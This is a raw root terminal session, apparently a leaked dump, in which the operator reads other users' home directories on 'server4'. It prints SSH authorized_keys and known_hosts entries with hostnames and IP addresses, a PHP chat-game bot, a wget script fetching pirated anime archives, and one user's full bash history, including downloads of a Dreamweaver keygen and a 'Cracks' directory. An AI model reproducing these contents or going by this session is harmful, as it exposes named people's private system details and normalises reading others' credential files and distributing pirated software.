AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZ uiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQD ibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaS ichE= irc.rasterized.net,76.108.85.21 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyaQ6kpWI3wBfCGF+/EGC8JLuPI4ahiREMNe0e /vUAfFjT044zOVoowDC0Ek1wgh0TAuv3Dzjz6XxknwMkaYo/KCM+CmTAQqYGj4Awx Urzy4ImUJNxvQVJxrHRL40B61lT+lSXpgsjBTaV4qWE5vTIMoa9uz1159D5CpHMuA KU70= www.zloche.net,80.248.208.223 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZ uiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQD ibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaS ichE= www.zloche.com,81.93.5.180 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtSbs8/VCyV0KAFHWmggnC3QHa2qh9AYdUYE4O rbUK7oA4Ozq8D5V2GYhBmpkMvYcCENNi7cxyeTEMdEeBWok/zRcxRkGYAxM7Zg2Ns bIez9+bB1ojKy5BoNLsocoQbvzgVbxOXHvRwcWTGK9H7Yq8ZJPLC4ezsOpAcyTeBH EeuM= server1,65.92.158.240 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyNZz wK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7GFLr rrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdSXaasNJ Mb4U= server1.zloche.net ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyNZz wK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7GFLr rrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdSXaasNJ Mb4U= irc2.zloche.net ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAt9hfTe460T8l2oPkq3WD7fnie6fzIWH9ep1HX 8NVSzLFT+fUlLzgpWUU+g1HycYAV4S5nSfG3FSsPfeEETXzBaaYeAU87qn3vtjuRU 7Fp5Tv6mPnFiOJuDwJ4wG3yA8+oyRzTMThfhnGDP+H90eacVPjxoTN0lQiM3VvmhR 4j9rTfaVkx9BDmUz2sorEMAHcpajK3h2dB124tiNR/IggGvXmwPUJym10O1QZKVrj Ckdbacz9zV4ROmc5c/hucKGwZH9mOW+Zo1GB2OP7LHMPPCmO7qymvG67eOsyc/QmB QcsqBSPYmC1xNms9c6cbnZeUvjYFY0rfQql39oytXeJ7w== server4:/home/stax/.ssh# cd .. server4:/home/stax# cat b0t.php 2) { //echo "\n\n\n" . $comp[0] . "\n\n\n"; //echo $input . "\n"; } if($comp[0] == 'MSG') { $message = split('=',$input,3); $message = $message[2]; $message = explode(chr(0),$message); $message = $message[0]; echo '<' . $comp[1] . '> ' . $message . "\n"; } $say = file_get_contents("say"); if ($say != "") { fputs($socket,"MSG==Zokio=:-::::".$say.chr(0)); unlink("say"); $file = "say"; $fp = fopen($file,"w+"); fwrite($fp,""); fclose($fp); } //echo "\n\n\n" . $comp[0] . "\n\n\n"; if($comp[0] == 'PING') { fwrite($socket,"PONG=" . $comp[1] . chr(0)); } if($comp[0] == 'KICK') { $socket = fsockopen( $address , $port ); fwrite($socket, "INIT=2963739=" . $user . "=1=10sssss=" . $pass . "=bot" . chr(0)); fwrite($socket, "TELEPORTSPOT=32=255=255" . chr(0)); } /* $socket = fsockopen( $address , $port ); fwrite($socket, "INIT=2963739=" . $user . "=1=10sssss=" . $pass . "=bot" . chr(0)); fwrite($socket, "TELEPORTSPOT=72=255=255" . chr(0)); */ //EWONE=3784=10=4=3=250D48=8753E1=2B7ED7=franco==. if($comp[0] == 'NEWONE') { $clients["" . strtolower($comp[8]) . ""] = $comp[1]; //echo 'test'; echo $clients["" . strtolower($comp[8]) . ""]; foreach($clients as $value) { echo $value . "\n"; } } if($comp[0] == 'CLICK') { if($comp[1] == $suivre) { fwrite($socket,'CLICK=' . $comp[2] . '=' . $comp[3] . chr(0)); } } //MSG=xxladyxx=toi mon ange qui vole emaine moi pour ne plus soufrire dans t //bras sa jlai inventer il a 2 semaine . if($comp[0] == 'MSG') { $comp2 = split('=',$input,3); $quiadit = $comp2[1]; $aditquoi = $comp[2]; if(strtolower($aditquoi) == '!version') { echo '11111!!!!!'; $temp = time() - $lastasked; if($temp >= 1) { $lastasked = time(); fwrite($socket,'MSG==undefined=:-::::REALB0T V1.1 - par Stax' . chr(0)); } //MSG==undefined=:-::::/msg whitehack ^^. } /*if(strtolower($aditquoi) == '!version') { echo '11111!!!!!'; $temp = time() - $lastasked; if($temp >= 1) { $lastasked = time(); fwrite($socket,'MSG==undefined=:-::::REALB0T V1.1 - par Stax' . chr(0)); } //MSG==undefined=:-::::/msg whitehack ^^. } */ if(preg_match("#^!emotion (.+)#i", $aditquoi) ) { //echo '11111!!!!!'; $temp = time() - $lastasked; if($temp >= 1) { $lastasked = time(); $tobsaid = explode('!emotion ',$comp[2],2); $tobsaid = $tobsaid[1]; fwrite($socket,'EMOTEID='. $tobsaid . chr(0)); } //MSG==undefined=:-::::/msg whitehack ^^. } if(preg_match("#^!suis (.+)#i", $aditquoi) ) { $suivrelui = explode('!suis ',$comp[2]); $suivrelui = $suivrelui[1]; $suivre = $clients[strtolower($suivrelui)]; } //MSG==undefined=:-::::/msg whitehack ^^. if(preg_match("#^!dit (.+)#i", $aditquoi) ) { //echo '11111!!!!!'; $temp = time() - $lastasked; if($temp >= 1) { $lastasked = time(); $tobsaid = explode('!dit ',$comp[2],2); $tobsaid = $tobsaid[1]; fwrite($socket,'MSG==undefined=:-::::' . $tobsaid . chr(0)); } //MSG==undefined=:-::::/msg whitehack ^^. } if(preg_match("#^!click (.+)#i", $aditquoi) ) { //echo '11111!!!!!'; $temp = time() - $lastasked; if($temp >= 1) { $lastasked = time(); $tobsaid = explode(' ',$comp[2]); //$tobsaid = $tobsaid[1]; fwrite($socket,'CLICK=' . $tobsaid[1] . '=' . $tobsaid[2] . chr(0)); } //MSG==undefined=:-::::/msg whitehack ^^. } if(strtolower($aditquoi) == '!boss') { echo '11111!!!!!'; $temp = time() - $lastasked; if($temp >= 1) { $lastasked = time(); fwrite($socket,'MSG==undefined=:-::::Le boss, c est STAX!!!!!!!' . chr(0)); } //MSG==undefined=:-::::/msg whitehack ^^. } if(strtolower($aditquoi) == '!moonwalk') { //echo '11111!!!!!'; $temp = time() - $lastasked; if($temp >= 1) { $lastasked = time(); fwrite($socket,'CLICK==' . chr(0)); fwrite($socket,'CLICK=0=0' . chr(0)); //fwrite($socket,'CLICK==' . chr(0)); } //MSG==undefined=:-::::/msg whitehack ^^. } if(strtolower($aditquoi) == '!bouger') { $lastmovement = time() - 5; //$lastmovement = 9999999999999999999999999999999; } //MSG==undefined=:-::::/msg whitehack ^^. if(strtolower($aditquoi) == '!stop.bouger') { //$lastmovement = time() - 5; $lastmovement = 9999999999999999999999999999999; } //MSG==undefined=:-::::/msg whitehack ^^. if(strtolower($aditquoi) == '!date') { $temp = time() - $lastasked; if($temp >= 1) { $lastasked = time(); fwrite($socket,'MSG==undefined=:-::::la Date : ' . date("m/d/y H:i:s") . chr(0)); } //MSG==undefined=:-::::/msg whitehack ^^. } } $temp11 = time() - $lastmovement; if($temp11 >= $movetime) { fwrite($socket,'CLICK=' . mt_rand(25,400) . '=' . mt_rand(25,400) . chr(0)); $lastmovement = time(); } } ver4:/home/stax# cat meh.sh wget http://88.191.14.73/awarefirst/Blood+/Blood+_02_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_03_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_04_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_05_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_06_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_07_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_08_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_09_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_10_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_11_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_12_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_13_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_14_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_15_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_16_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_17_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_18_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_19_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_20_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_21_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_22_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_23_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_24_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_25_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_26_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_27_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_28_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_29_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_30_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_31_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_32_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_33_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_34_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_35_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_36_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_37_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_38_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_39_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_40_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_41_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_42_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_43_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_44_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_45_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_46_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_47_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_48_DVD_anime-master_fr.rar wget http://88.191.14.73/awarefirst/Blood+/Blood+_49_DVD_anime-master_fr.rarserver4:/home/stax# server4:/home/stax# cd .. server4:/home# cd gumbie/ server4:/home/gumbie# ls -alh total 263M drwxr-xr-x 10 gumbie gumbie 4.0K May 30 04:45 . d-wx--s--x 17 root root 4.0K May 6 03:51 .. -rw-r--r-- 1 gumbie gumbie 266 Jan 28 17:50 .alias -rw------- 1 gumbie gumbie 3.6K Jun 9 05:53 .bash_history -rw-r--r-- 1 gumbie gumbie 567 Jan 28 17:50 .bash_profile -rw-r--r-- 1 gumbie gumbie 1.8K Jan 28 17:50 .bashrc -rw-r--r-- 1 gumbie gumbie 375 Jan 28 17:50 .cshrc -rw-r--r-- 1 gumbie gumbie 14 Feb 3 16:25 .screenrc drwx--x--- 2 gumbie gumbie 4.0K Feb 3 16:12 .ssh drwxr-xr-x 4 gumbie gumbie 4.0K May 27 17:35 Apps -rw-r--r-- 1 gumbie gumbie 95M May 27 18:08 Backup drwxr-xr-x 2 gumbie gumbie 4.0K May 27 17:49 Backups drwxr-xr-x 5 gumbie gumbie 4.0K Jun 1 05:52 Incoming -rw-r--r-- 1 gumbie gumbie 168M May 30 04:54 Ircd_Services_Backup-052907.tar.bz2 drwxr-xr-x 2 gumbie gumbie 4.0K May 27 17:47 Text drwxr-xr-x 2 gumbie gumbie 4.0K May 27 17:43 Work drwxr-xr-x 6 gumbie gumbie 4.0K Jun 3 22:15 public_html drwxr-xr-x 6 gumbie gumbie 4.0K May 27 17:47 wifi server4:/home/gumbie# cat .bash_history w lastlog | less last | less ls / ps aux | less ps auxww | less id ulimits ulimit -a free uptime sudo su - passwd ls -la .ssh chmod o-xr .ssh pico .ssh/authorized_keys pico .screenrc sudo su - uptime screen -x vmstat sudo su - uname -s uname -a ls /usr/src df screen -e^Gg screen sudo su - screen -e^Gg screen -e^Gg screen -x screen -x screen -x screen -x screen -x screen -x screen -x w w mkdir Incoming ls /home adduser ircd sudo su- sudo su - screen -x sudo su - ps x kill -9 3237 screen -e^Gg passwd ssh zloche.net ssh zloche.net ssh zloche.net sudo su - sudo su - ssh zloche.net ssh zloche.net sudo su - screen -x screen -x screen -wipe screen -e^Gg ncftp server3 apt-get install ncftp sudo su - rm -rf Electronics_Apps ls sudo su - ls mkdir public_html mv Electronic_Apps/ public_html/ ls -la public_html/ cd public_html/Electronic_Apps/ ls cd Xlinx/ ls rm -rf Xten.Networks.X-Pro.v2.2.2.ALL.PPC.Retail-DVTPDA/ ls ls -l rm *linux* rm *Linux* ls cd public_html/ ls cd Electronic_Apps/ ls cd Xlinx/ ls-l ls -l df cd .. screen -x df du | tail cd public_html/ ls ls Electronic_Apps/ mv Electronic_Apps/Ebooks/ . ls ls -l ls ls -la cd .. ls -la less .alias screen -x screen -x screen -x screen -x screen -x screen -x screen -x cd public_html/ rz screen -x rz screen -x screen -x ls -l df mkdir Backups mv NagiosAgent_nrpe.tgz roots_new_s3_apps.tar.bz2 Backups/ ls cd New mkdir DW cd DW man wget wget -b http://201.221.144.232/Appz/Adobe.Dreamweaver.CS3/Adobe.Dreamweaver.CS3.exe ps x wget -b http://201.221.144.232/Appz/Adobe.Dreamweaver.CS3/DW-CS3-Keygen.exe wget -b http://201.221.144.232/Appz/Adobe.Dreamweaver.CS3/DWcs3-Medicina-www.ProgramasFull.com.rar wget =b http://chaiyaphum.nfe.go.th/download/program/Macromedia%20Dreamweaver%20MX/Macromedia%20Dreamweaver%20MX/Serial%20No.txt wget -b http://chaiyaphum.nfe.go.th/download/program/Macromedia%20Dreamweaver%20MX/Macromedia%20Dreamweaver%20MX/Serial%20No.txt fg jobs ps x wget -b http://chaiyaphum.nfe.go.th/download/program/Macromedia%20Dreamweaver%20MX/Macromedia%20Dreamweaver%20MX/Setup.exe tail -F wget-log* ps x ps xw ps xww ls ps xww fg tail -F wget-log* watch tail -F wget-log* watch tail wget-log* tcsh fg tail -F wget-log* ps xww df df ps xww fg tail -F wget-log* ps xqq ps xww fg ls -l ls -l ls -l ps xww fg screen -x screen -e^Tt screen -x screen -e^Tt screen -x screen -x screen -x cd DW ls sz * screen -x screen -x screen -x ls ls Apps/ ls ls DW mv DW Apps/Dreamweaver ls ls Incoming/ ls public_html/ df ls cd public_html/ ls cd Ebooks/ ls cd Programming/Perl/ ls -la less index.html ls ls -l ls .. ls ../python ls ../Python/ ls -l ../Python/ ls -la ../Python/ mv index.html index.html-broken ls cd Incoming/ rz ls tar -tzf snort-2.7.0.beta2.tar.gz tar -xzf snort-2.7.0.beta2.tar.gz cd snort-2.7.0.beta2 ls ./configure --help ./configure rz mv libpcap-0.8.1.tar.tar libpcap-0.8.1.tar.gz tar -tzf libpcap-0.8.1.tar.gz tar -xzf libpcap-0.8.1.tar.gz mv libp* ls libp* mv libp* .. cd ../libpcap-0.8.1 ls ./configure make sudo make install cd ../snort-2.7.0.beta2 ./configure cd .. ; lynxhttp://www.pcre.org lynx http://www.pcre.org tar -tzf pcre-7.1.tar.gz tar -xzf pcre-7.1.tar.gz cd pcre-7.1 ls ./configure make sudo - make install sudo make install cd ../snort-2.7.0.beta2 ./configure make make install sudo make install ls cd doc ls cp ../doc ~/public_html/snort_doc cp -R ../doc ~/public_html/snort_doc cd .. ls ls etc less etc/snort.conf ls ls etc ls templates/ ls con ls contrib/ ls schemas/ ls src ls rpm ls m4 ls doc less doc/README.ssh screen -x screen -x ls ls public_html/ mkdir public_html/Cracks cd public_html/Cracks rz ls -la screen -x screen -x screen -x screen -x server4:/home/gumbie# cd .ssh server4:/home/gumbie/.ssh# ls -alh total 20K drwx--x--- 2 gumbie gumbie 4.0K Feb 3 16:12 . drwxr-xr-x 10 gumbie gumbie 4.0K May 30 04:45 .. -rw-r--r-- 1 gumbie gumbie 4.6K Feb 3 16:18 authorized_keys -rw-r--r-- 1 gumbie gumbie 3.4K Mar 24 03:26 known_hosts server4:/home/gumbie/.ssh# cat * ssh-dss AAAAB3NzaC1kc3MAAACBAIkoc5RisBTJmtAUFmSedLFXUOtADHiPUNVgvS3aEJ/ EauJM8Bvldd7AlNL2IoW+BVyI9qQ9F5u7ck925L3LFO2DySquqTUvu6wC1hcG+Q JmLvXWdZlp7qqiaVhQPspf++3PnpL/9W3Ls06CJTkRpWFb5pyBeB5srYv+pO26i 1xfAAAAFQCDQHjFR6JYK2BMfYzeqv5el4fsJQAAAIBQZW0fqGNmIxFANmeHcAWU low8cwzH3bYltUHxYqFmogv7KhXppAzmDuptjqxpAAsiXResTflS484DieIwssz 8z9IB+4hGITpnPOHQT1ddxIq614MbkNlIMbCDXA1Ikbf0UNbJbN5fTd3JBZWU93 lp2blJ+0VcmI2o3SXLZJgiLwAAAIAMXILSm58KHdeCaeNb/EdSXAqnC7ZQ3LElN dgv0KX2d6t2ec4MWXjoicuIjTE5ZAh4m6e+vVP3yaxSGaxtZ6TZKtS1P2Ku0MnY Odzer5y7C1EcQXyshYN9uikNEp3yiOk/n2mbHv8BrJr/Q/0FqWVn3FDzJ2O/szt 7iXrx+67IYg== gumbie@apache.rmachine.net ssh-dss AAAAB3NzaC1kc3MAAACBAMhBcEfcxCSsSXvoeP9FA+oyHyDN8N4bH8WMn62STdn sRGo1BGQNXYw3+wySs7L9XilUOC1Tnorkc9qsgZnsWfujfTRU2WOvdZ+PfkZFhy ser/xwMbmCNjovC1QONmq+UfvHoisHUPHymSIcL1jN704qB69JOGYwQy8YndPva JlbAAAAFQCc1KfmY/qwIH/Z0RCTTFiX0DgzIQAAAIAlVsYB57+E7JUvsc54+6ln zAb84NlzS3aIOI+G4ctrXjQ962RxBEn1YezFH0xfPpnN15C3fTtU+NU/BqWX0Lp lGMK7xkvelQmPzPINebrWsAGQewWelPfqWABZ+9UIv7KbpnYYmG91aka9Xtdj7+ 3b0Xaq5wpQjGTrvlEhUnSOewAAAIBdoaDNivxRzV5oK310p4Wp0PGzfqjzB0glw zTi0zwvs6nTdA4qqgh1HaU9SYtpUwTq9tNBQs5cftTZS0OuyYfedUtt2DjM6S07 Cj2zkh1C1Obd4M+ABD9LNRigSfyi9wGwtxXpMk7gwTkS1msyqHVD5kSxRTmyUl4 0QukqiAN5PA== "gumbie@toshiba_dsa" ssh-dss AAAAB3NzaC1kc3MAAACBAIu2cdN3RRzMDD7H45m3ycrDZNoiQpm2NAC1fqc6HtX xt1yE2k5MxNKj2+PJJ5hdPghNZJy7+yD+gsEnbPpEY670yp0WRqF7Pea55zOr5D 8LUt7ONRqSkoMiXCSxXOzbbgpH/f2bucJpeeXU7N4sCsFTwCcs+wOjkWw45WOOY hYRAAAAFQDVOp3utFXwVFKdWVhF+PWOVFo1UQAAAIAjZoT8OWf+V1myE8qXX53p tpFz+mkz9Cke/nXnCop7iyWIRMwQyaHiB/m4QFj37jlrVBm3jW185gTJuHcBecp nLtT+1tZE8v52uvHK1b4Tk+tGZSAnXyFCd2527pzu4UmD89Q3HgSJkPWaimtiR+ upc/7lAda6Vd5gGO6WgSlUIwAAAIBdK2rixeRLzk0OP91F1LyEP6AG7xK7fcjST PNdQBNx01jk3B2hT/EQZxp5To+F3UCsjqCSlA8+Hzc2BicLfEmL8E+sWgZGuAo/ tREPeLT8YWPL+JEBK5SJBHpWK4YyGw2pw2wpiecg4X6NMDH/SBDo8drhsDmHKIi H0AmWyeYGxw== "gumbie@guinness" ssh-dss AAAAB3NzaC1kc3MAAAEBAKunfYaKQoO/n2Hd/tQi+BWaB3asXeiG2pHrWXsysMP FucW5dtzupXlyNQVw7Ul6F9DIf0i2mq0pEYRG3DOwE6WpSRzoaVLwIgreWqfsey OHPj1VVEpqndD1MBN8DB7KhUqmdcZaA0ZHKckfKQ32jNwQzUv8dLiFpxrMgG4NH KnxeljB3KEXrvfnaLQKzjZM493Kyz2YRrYRRDEmIV9gDXyf7K7tTfTnEH3QlkZn tl2EuT7DAwosVp65Sc9eqg/bTbFPwFV1NBtCLHYqhwbr2o4T47K6p52rleIlc0n KEuIwDC7UXYF/NYK7LlET0Hs2UeORIAqCVpEM9GLtqD86mOEAAAAVALbqDYEBLt eFV2KXeFxSgg1dTi7vAAABAByEI62hyW1nvzlpZDoYp2IBQfS+VfDFPNoxA4ot9 0KgL0y1cF3HOYVfcEDPj5ONK8246/swSCGgQt8twutXsjIo+xiuYO5h6cPLqRTe ycMUrP2QQMMxZXuXMJeXLJWJ+e1n5i+vrAJf6X2T0TI+ry6X9u4gtR5uInW58sN AERtsaxwj+H+ifDIaCFewylmTIOp5A1equsNlHis2B0j7VBLerk7maRGOCzrc4j dA+ztM5tJaUy8x83bEYiXDOZoeqVmoF2gxTenZiOmQBHDRE4+WlJZCj51eS8r/8 zzSgGMsD0TY5jpcU5zocAi1cd3Woz6oZa8XZPoFke+rr9zK5TwAAAEBAKG8GciK XT79FOrnntiM3fGqQcI21e6w0GczRX6Q1bie9te7c8Z69HIWHeJ43MKAzWi7Zz8 rPcHAD30VW7bkgGyGHaPBz79ACW5u/A6gCLjYHM/A+RM/4fGIsiVa90Bb6k1nGU kzRNpp1l+xKrQG9uc8cJXMO5QAuup7FXnZFjMQ3pNs7y9HhCEsSuAIOsCdvHOgz HW602N1DV76jALAIA1UbY8vv82o5dy+BNxRhjsAOpT17VqJk8SOp+BIpiEIy/gn fk6lvbHxev2DjM97pRWnmb0lFkNNptlXz7GPh8TAaMUqXocMoVpC4Dqz2TUyNAL yrZQgtnX+vdfnSjSsyzM= "gumbie@cyber" ssh-dss AAAAB3NzaC1kc3MAAAEBAPb8NR2McHshyGs0vPafixcBm+NpwgMo0Cyd+ltzj0N yo2hOwj3UXb+zW/w/RHPRBHn2cAPhqSLWYE1BsMaz1nuensZPFGDl0Pr5RGqwx+ Hfj4tJ4zV8uKDGb1NYzvF+243CmHvtXnX7yH65yJTvSNTwDVgsqqHh6w6MbaYak qsiyVkqEmW/wS4YhEnaVpdPo1ziWdNtsz2uFY0VccHgapDJ6rYV12Wz3wKDbFLd t7uIaLSd9YNWFYo3Me5G/J+LMq7Nu0w6r6StIQ7r7zOtFvaOvBGtHJ9w6f2Mx4m d6jknkIZyUojA0CxwAjg15kNJKsHI1yWgH4p90YWxlBcRy9MAAAAVAMdFizakX6 WuAWGiXKvacEuSr+NrAAABAAMQPqx9YN0ijnefZzC1GM+csX0PrhQWoatEmbLe+ /NTE6lUFj79IFF6ImcSTbFrJ4n7k19a0IwvuTICVhpNQPWSML/8gQlGLIZ5Gbf8 t0tRAVffnfwiFxhJxxgUH/yEH0SlrqlenPuPCpTMAmWXoebyL3kVYcyDeSxkeIr sfqbVBIoXVtUMIZQNKXyCeT5E7z9Nye8aF8lOUWrGIwSeNdfye1/24fTD0V0gAv m+PLCbTqVsGUoPqksIsha6v/TRceRBtFQGIG4QUja7JUlJpPPYpAV4+ynlWR64W V7ZIskqlJlGUTv6B0LCcCWz5CnAeQFwpLesiDWqTpRpLODrWYkAAAEAIUb7Gban iWZRRhk1ytgQXGHlQVnlLBLZCh+BEp1p1ty3jfOIbOg6cAKYVNFBp5g/EH+IUah 1Z+cCSBnitgSMIWpxaCvV4XXT0WwOvATEV6C3Pr+XQ/rcq5E/0jVortUy6rErZT N6pRYtKVvB4Z8UiEnxata0sgXV3PeUIzBDj7NOUeXnwGjZuJZAKcWg2s4LQerTQ Puvf/IwIIjeSn+h0TVutsvKT5h/A6mCx7Yg1iM5uXI4I0ayw2mzdrYX96Sfpwfe tRmu5qVQaYc5pK4PPeQEh2UTYg4cA1QY2kkKKrPhjBPOrAbwc0VukhpQAM1c4gW LguE7DCkNwP9g1ExjDw== rhopkins@puma.nfic.com ssh-dss AAAAB3NzaC1kc3MAAACBAOdZHYBhapx9Qjmduwyxn02ypuHnvMJnqMaL8g62v/3 wWKEQcPYE5hw4aizWloS9Tu1lzze9S8Rk7MkSjRtLmV+c9MTy40eS2jKRNb1MSu HZXjvh5n81wObdixCKv89mOy/F7dxespM+JC9mSIGb1LunLV3Zxx3wIXi79auVC O73AAAAFQDeJ2iv5/woRmyIxYMlZGAUTTNICQAAAIEA2UgPWL7+sU5TStdTWPOn Bq+g5QRJkZ86R04ObERaCljcq93QJKxASL2q8x5MdyAi7j42FIwQOi1tMi7M4Gp ozzePEXdJMwkOXtJw6mxBw9wOAXfvUomKkq4VTKC88U6iKA7QP5BtTK9vQbVzeB rrt/P+dPUo0a7hGCiL+J9VT3YAAACAeFWr1JM2ITHwwS9S0DStR+8fUJE4NHyC3 Tggp9tTgBfnqglp4mAEdGJVdef1bDaEUCKI0XCWo1Eou/TnaQLdbxAYHlygCR+x NoZ/UOmu9fbuUU43YqzafR8H9i0FO11Q6iN+y2wROD/wXOTig+FEbQW8/h4rHR3 C4pPd7pOX2Fk= gumbie@vds349.sivit.org 71.192.67.163 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAsRBHrWAwTKSWF0DdzGeLaWZYSGFjdPmtH+h ig6rozw5akKT+l7JxMcPi0iW0kuImhOh/D7cVh7BlMQc5RjvrOigxN6RtrrUzE5 iUhdHRdlbQ5XWaPJQZLH6nQMnCvtGsj432OMi5NiWAs8QUp0duiOUPCQxq3hV/w q4MTqlP/Nk= rasterized.net,69.163.232.231 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyaQ6kpWI3wBfCGF+/EGC8JLuPI4ahiREMNe 0e/vUAfFjT044zOVoowDC0Ek1wgh0TAuv3Dzjz6XxknwMkaYo/KCM+CmTAQqYGj 4AwxUrzy4ImUJNxvQVJxrHRL40B61lT+lSXpgsjBTaV4qWE5vTIMoa9uz1159D5 CpHMuAKU70= server1.zloche.net,65.94.18.39 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyN ZzwK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7 GFLrrrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdS XaasNJMb4U= zloche.zapto.org,65.94.86.4 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyN ZzwK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7 GFLrrrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdS XaasNJMb4U= rmachine.dynalias.net,71.192.67.95 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAsRBHrWAwTKSWF0DdzGeLaWZYSGFjdPmtH+h ig6rozw5akKT+l7JxMcPi0iW0kuImhOh/D7cVh7BlMQc5RjvrOigxN6RtrrUzE5 iUhdHRdlbQ5XWaPJQZLH6nQMnCvtGsj432OMi5NiWAs8QUp0duiOUPCQxq3hV/w q4MTqlP/Nk= 65.92.60.252 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyN ZzwK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7 GFLrrrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdS XaasNJMb4U= 65.94.125.121 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyN 